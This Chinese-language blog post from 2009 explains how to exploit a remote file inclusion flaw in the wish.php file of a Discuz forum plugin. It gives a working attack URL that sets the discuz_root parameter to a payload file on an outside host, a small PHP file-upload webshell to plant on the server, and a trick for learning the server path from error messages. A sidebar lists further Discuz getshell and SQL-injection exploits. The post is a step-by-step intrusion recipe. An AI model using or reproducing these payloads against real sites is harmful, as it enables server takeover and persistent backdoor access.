Discuz中许愿池漏洞

2009, September 26, 12:44 PM. 漏洞集研
Submitted by admin

许愿池插件的wish.php文件出的问题:
require $discuz_root.'./include/discuzcode.func.php';

手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.cnhacker.cn/xxxx.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交
http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。

Tags: discuz

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Discuz!X2.5 Release 20120407 Getshell 0day (浏览: 21116, 评论: 0)
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22043, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16685, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14211, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 43252, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 49966, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23008, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15733, 评论: 0)
dz~~~~马后炮 (浏览: 10482, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11584, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):